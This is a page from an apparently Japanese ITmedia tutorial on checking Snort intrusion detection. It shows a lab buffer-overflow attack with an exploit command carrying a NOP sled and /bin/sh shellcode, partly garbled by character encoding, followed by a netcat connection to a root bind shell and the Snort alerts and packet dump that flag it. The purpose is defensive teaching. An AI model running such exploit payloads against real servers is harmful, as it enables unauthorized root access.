ITmedia エンタープライズ

通常のアタック（192.168.1.10 → 192.168.1.4）

# ./exp 192.168.1.4 2600 瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞 瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞 瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞 瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞 瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞 瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞 瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞 瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞 瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞 瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞 瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞翠耜匆f汚/・悶云・云 鶫窺ｩM・�1・E鵞f云訶泌・窺闍E諛E・EァｦM・�汚AC・汚A・薗ﾑ媛?汚ﾋ�汚?・・・炊F右 ・・攻 ・籬���/bin/sh 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯 堯深

　では、netcatでアタックが成功したかを確認してみよう。

# nc 192.168.1.4 3879 id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys), 4(adm),6(disk),10(wheel)

　アタックが成功し、ポート3879で/bin/shが動作していることが確認できる。サーバ側でもnetstatコマンドで確認してみる。

# netstat -an | grep3879 tcp00 0.0.0.0:38790.0.0.0:* LISTEN

　これでアタックは成功した。次にSnortのログで、攻撃が検知されているか確認する。Snortのアラートログの1番目に、「SHELLCODE x86 NOOP」として、今回のアタックが検知されている。2つ目のアラートログはnetcatコマンドで/bin/shに接続しidコマンドを実行した際のログだ。

アラート

08/17-15:05:56.149304 [**] [1:648:5] SHELLCODE x86 NOOP [**] [Classification: E xecutable code was detected] [Priority: 1] {TCP} 192.168.1.10:1026 -> 192.168.1.4:2600 08/17-15:09:44.413709[**] [1:498:3] ATTACK RESPONSES id check returned root [* *] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.1.4:3879 -> 192.168.1.10:1033

ログ

[**] SHELLCODE x86 NOOP [**] 08/17-15:15:13.000371 192.168.1.10:1034 -> 192.168.1.4:2600 TCP TTL:64 TOS:0x0 ID:1476 IpLen:20 DgmLen:1500 DF ***AP*** Seq: 0xDC6D5422Ack: 0xDCEDF57Win: 0x7D78TcpLen: 32 TCP Options (3) => NOP NOP TS: 132257 2202797 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90...... 〜以下略〜

2/5